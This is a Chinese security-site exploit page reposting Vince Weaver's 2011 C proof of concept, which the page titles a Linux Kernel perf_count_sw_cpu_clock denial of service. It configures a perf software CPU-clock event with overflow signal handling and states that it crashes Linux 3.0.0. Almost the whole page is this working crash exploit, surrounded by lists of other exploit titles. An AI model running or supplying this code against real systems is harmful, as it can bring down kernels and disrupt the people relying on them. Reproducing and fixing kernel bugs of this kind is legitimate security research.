首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Linux Kernel 'perf_count_sw_cpu_clock' event Denial of Service
来源:vweaver1 _at_ eecs.utk.edu 作者:Weaver 发布时间:2011-09-05  

Vince
/* Error with overflows and perf::perf_count_sw_cpu_clock                    */
/* This test will crash Linux 3.0.0                                          */
/* compile with gcc -O2 -o oflo_sw_cpu_clock_crash oflo_sw_cpu_clock_crash.c */
/* by Vince Weaver <vweaver1 _at_ eecs.utk.edu>                              */
#define _GNU_SOURCE 1

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>

#include <linux/perf_event.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <asm/unistd.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <signal.h>

#include <sys/prctl.h>
#define MATRIX_SIZE 512
static double a[MATRIX_SIZE][MATRIX_SIZE];
static double b[MATRIX_SIZE][MATRIX_SIZE];
static double c[MATRIX_SIZE][MATRIX_SIZE];
static void naive_matrix_multiply(int quiet) {
  double s;
  int i,j,k;
  for(i=0;i<MATRIX_SIZE;i++) {
    for(j=0;j<MATRIX_SIZE;j++) {
      a[i][j]=(double)i*(double)j;
      b[i][j]=(double)i/(double)(j+5);
    }
  }
  for(j=0;j<MATRIX_SIZE;j++) {
     for(i=0;i<MATRIX_SIZE;i++) {
        s=0;
        for(k=0;k<MATRIX_SIZE;k++) {
    s+=a[i][k]*b[k][j];
 }
        c[i][j] = s;
     }
  }
  s=0.0;
  for(i=0;i<MATRIX_SIZE;i++) {
    for(j=0;j<MATRIX_SIZE;j++) {
      s+=c[i][j];
    }
  }
  if (!quiet) printf("Matrix multiply sum: s=%lf\n",s);
  return;
}

static int total=0;
void our_handler(int signum,siginfo_t *oh, void *blah) {
  int fd=oh->si_fd;
  ioctl(fd , PERF_EVENT_IOC_DISABLE,0);
  total++;
  ioctl(fd , PERF_EVENT_IOC_REFRESH,1);
}
int perf_event_open(struct perf_event_attr *hw_event_uptr,
      pid_t pid, int cpu, int group_fd, unsigned long flags) {
  return syscall(__NR_perf_event_open,hw_event_uptr,pid,cpu,group_fd,flags);
}
int main( int argc, char **argv ) {
 int fd;
 void *blargh;
 struct perf_event_attr pe;
 struct sigaction sa;
 memset(&sa, 0, sizeof(struct sigaction));
 sa.sa_sigaction=our_handler;
 sa.sa_flags=SA_SIGINFO;
 if (sigaction(SIGIO,&sa,NULL)<0) {
   fprintf(stderr,"Error setting up signal handler\n");
   exit(1);
 }
        memset(&pe,0,sizeof(struct perf_event_attr)); 
 pe.type=PERF_TYPE_SOFTWARE;
 pe.size=sizeof(struct perf_event_attr);
        pe.config=PERF_COUNT_SW_CPU_CLOCK;
 pe.sample_period=100000;
 pe.sample_type=PERF_SAMPLE_IP;
 pe.read_format=PERF_FORMAT_GROUP|PERF_FORMAT_ID;
 pe.disabled=1;
 pe.pinned=1;
 pe.exclude_kernel=1;
 pe.exclude_hv=1;
 pe.wakeup_events=1;
 fd=perf_event_open(&pe,0,-1,-1,0);
 if (fd<0) {
    printf("Error opening\n");
 }
 blargh=mmap(NULL,(1+2)*4096,PROT_READ|PROT_WRITE,MAP_SHARED,fd,0);
 fcntl(fd,F_SETFL,O_RDWR|O_NONBLOCK|O_ASYNC);
 fcntl(fd,F_SETSIG,SIGIO);
 fcntl(fd,F_SETOWN,getpid());
 ioctl(fd,PERF_EVENT_IOC_RESET,0);
 ioctl(fd,PERF_EVENT_IOC_ENABLE,0);
 naive_matrix_multiply(0);
 ioctl(fd,PERF_EVENT_IOC_DISABLE,0);
 munmap(blargh,(1+2)*4096);
 close(fd);
 printf("Total overflows: %d\n",total);
 return 0;
}

 


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Citrix Gateway ActiveX Control
·DVD X Player 5.5 .plf PlayList
·DVD X Player 5.5.0 Pro / Stand
·BroadWin WebAccess Client Mult
·mp3 Kaydet Local Buffer Overfl
·Apple QuickTime PICT PnSize Bu
·Rainer v0.1 by localh0t
·DragonflyBSD PortBind TCP (133
·构造注入点后门代码(asp,aspx,p
·Musiccut210p Local Buffer Over
·DVD X Player 5.5 Professional
·Cerberus FTP Server 4.0.9.8 (R
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved